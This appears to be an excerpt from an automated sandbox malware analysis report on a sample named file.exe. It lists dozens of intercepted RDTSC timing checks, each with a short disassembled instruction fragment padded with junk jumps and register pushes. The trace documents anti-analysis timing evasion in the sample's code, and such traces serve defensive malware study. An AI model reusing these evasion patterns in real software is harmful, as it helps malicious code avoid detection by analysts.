              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51205C0 second address: 5120660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79A547B38Fh 0x00000009 adc eax, 3DDC529Eh 0x0000000f jmp 00007F79A547B399h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F79A547B390h 0x0000001b or ax, 2498h 0x00000020 jmp 00007F79A547B38Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 cmp dword ptr [ebp-04h], 00000000h 0x0000002d jmp 00007F79A547B396h 0x00000032 mov esi, eax 0x00000034 pushad 0x00000035 mov al, A8h 0x00000037 push ebx 0x00000038 mov di, si 0x0000003b pop esi 0x0000003c popad 0x0000003d je 00007F79A547B3C2h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F79A547B399h 0x0000004b popad 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110180 second address: 51101FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F79A4C9A8F7h 0x00000011 or esi, 7F2B287Eh 0x00000017 jmp 00007F79A4C9A8F9h 0x0000001c popfd 0x0000001d push ecx 0x0000001e call 00007F79A4C9A8F7h 0x00000023 pop ecx 0x00000024 pop edi 0x00000025 popad 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F79A4C9A8F1h 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101FF second address: 5110205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110205 second address: 511021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push edi 0x0000000e mov cl, E9h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511021A second address: 511025F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F79A547B397h 0x00000010 pop eax 0x00000011 jmp 00007F79A547B396h 0x00000016 mov eax, dword ptr fs:[00000000h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511025F second address: 5110263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110263 second address: 5110280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110280 second address: 5110286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110286 second address: 511029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79A547B38Bh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511029C second address: 51102A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102A2 second address: 51102CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79A547B399h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102CA second address: 51102D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51102D0 second address: 511030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79A547B38Ah 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 18h 0x00000011 pushad 0x00000012 mov dh, EDh 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F79A547B390h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F79A547B38Eh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511030C second address: 511031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511031E second address: 511037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F79A547B396h 0x00000011 xchg eax, esi 0x00000012 jmp 00007F79A547B390h 0x00000017 push eax 0x00000018 jmp 00007F79A547B38Bh 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F79A547B395h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511037B second address: 5110381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110381 second address: 5110385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110385 second address: 51103A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F79A4C9A8F1h 0x00000011 mov ecx, 1D56DF27h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51103A8 second address: 51103C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51103C2 second address: 51103C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51103C6 second address: 51103CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51103CC second address: 5110401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 3C62FD07h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [75AF4538h] 0x00000012 jmp 00007F79A4C9A8F6h 0x00000017 xor dword ptr [ebp-08h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, A800h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110401 second address: 511046D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 call 00007F79A547B38Eh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor eax, ebp 0x00000011 pushad 0x00000012 mov ebx, eax 0x00000014 jmp 00007F79A547B398h 0x00000019 popad 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F79A547B399h 0x00000026 add ah, FFFFFFC6h 0x00000029 jmp 00007F79A547B391h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511046D second address: 51104D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79A4C9A8F7h 0x00000009 xor ecx, 015273FEh 0x0000000f jmp 00007F79A4C9A8F9h 0x00000014 popfd 0x00000015 mov si, E047h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e jmp 00007F79A4C9A8F3h 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movzx ecx, dx 0x0000002b mov edi, 001B4EBEh 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51104D2 second address: 51104F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F79A547B38Fh 0x00000016 pop esi 0x00000017 movsx edx, ax 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51104F7 second address: 51104FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51104FD second address: 511051C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511051C second address: 5110520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110520 second address: 5110524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110524 second address: 511052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511052A second address: 51105BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov si, 5D73h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [ebp-18h], esp 0x0000000f jmp 00007F79A547B396h 0x00000014 mov eax, dword ptr fs:[00000018h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F79A547B38Eh 0x00000021 xor cx, EBA8h 0x00000026 jmp 00007F79A547B38Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F79A547B398h 0x00000032 add esi, 0D9A5E08h 0x00000038 jmp 00007F79A547B38Bh 0x0000003d popfd 0x0000003e popad 0x0000003f mov ecx, dword ptr [eax+00000FDCh] 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F79A547B395h 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51105BF second address: 5110601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007F79A4C9A8EEh 0x00000010 jns 00007F79A4C9A927h 0x00000016 jmp 00007F79A4C9A8F0h 0x0000001b add eax, ecx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov cl, C0h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110601 second address: 511066E instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F79A547B395h 0x0000000d jmp 00007F79A547B38Bh 0x00000012 popfd 0x00000013 popad 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F79A547B38Bh 0x00000020 and ax, 6F1Eh 0x00000025 jmp 00007F79A547B399h 0x0000002a popfd 0x0000002b call 00007F79A547B390h 0x00000030 pop eax 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511066E second address: 5110689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8F7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110689 second address: 511068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100008 second address: 510000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510000E second address: 5100079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F79A547B390h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F79A547B391h 0x00000017 and ecx, 24CA9056h 0x0000001d jmp 00007F79A547B391h 0x00000022 popfd 0x00000023 mov dx, si 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F79A547B399h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100079 second address: 510009F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79A4C9A8EDh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510009F second address: 51000AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B38Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51000AF second address: 51000B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51000B3 second address: 51000CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79A547B38Ah 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51000CA second address: 51000EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e mov si, bx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dx, 32BAh 0x0000001a mov dx, C086h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51000EF second address: 5100106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B393h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100106 second address: 510014E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F79A4C9A8EEh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F79A4C9A8F7h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510014E second address: 5100153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100153 second address: 5100172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F79A4C9A8EEh 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100172 second address: 5100178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100178 second address: 510017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510017C second address: 5100180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100198 second address: 510019E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510019E second address: 51001A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51001A2 second address: 51001BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79A4C9A8ECh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51001BF second address: 51001C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51001C5 second address: 51001DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ch, 8Bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 00000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, ebx 0x00000014 mov di, 4A9Eh 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51001DE second address: 51001E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1FB01211h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51001E8 second address: 5100235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 inc ebx 0x00000008 jmp 00007F79A4C9A8EAh 0x0000000d test al, al 0x0000000f jmp 00007F79A4C9A8F0h 0x00000014 je 00007F79A4C9AB51h 0x0000001a jmp 00007F79A4C9A8F0h 0x0000001f lea ecx, dword ptr [ebp-14h] 0x00000022 pushad 0x00000023 mov al, 75h 0x00000025 movsx ebx, ax 0x00000028 popad 0x00000029 mov dword ptr [ebp-14h], edi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100262 second address: 5100266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100266 second address: 510026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510026C second address: 5100275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 8DA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100275 second address: 5100283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100283 second address: 5100287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100287 second address: 510028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510028B second address: 5100291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100291 second address: 51002A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 movzx esi, dx 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002A6 second address: 51002AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002AB second address: 51002CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b call 00007F79A4C9A8F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002F4 second address: 51002FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002FA second address: 51002FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002FE second address: 5100347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F79A547B390h 0x00000013 sbb ax, 7538h 0x00000018 jmp 00007F79A547B38Bh 0x0000001d popfd 0x0000001e call 00007F79A547B398h 0x00000023 pop ecx 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100347 second address: 510035C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F7A15638A22h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 movsx ebx, si 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510035C second address: 5100366 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100366 second address: 510039C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F79A4C9A8F2h 0x00000008 and esi, 74ABF128h 0x0000000e jmp 00007F79A4C9A8EBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 js 00007F79A4C9A9CDh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510039C second address: 51003A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51003A0 second address: 51003BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51003BB second address: 510042D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79A547B38Fh 0x00000009 add cx, D7CEh 0x0000000e jmp 00007F79A547B399h 0x00000013 popfd 0x00000014 mov ecx, 2837A5D7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c cmp dword ptr [ebp-14h], edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edx, 1E7B963Ah 0x00000027 pushfd 0x00000028 jmp 00007F79A547B38Bh 0x0000002d sbb ecx, 290D65DEh 0x00000033 jmp 00007F79A547B399h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100581 second address: 5100587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100587 second address: 510058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510058D second address: 5100591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
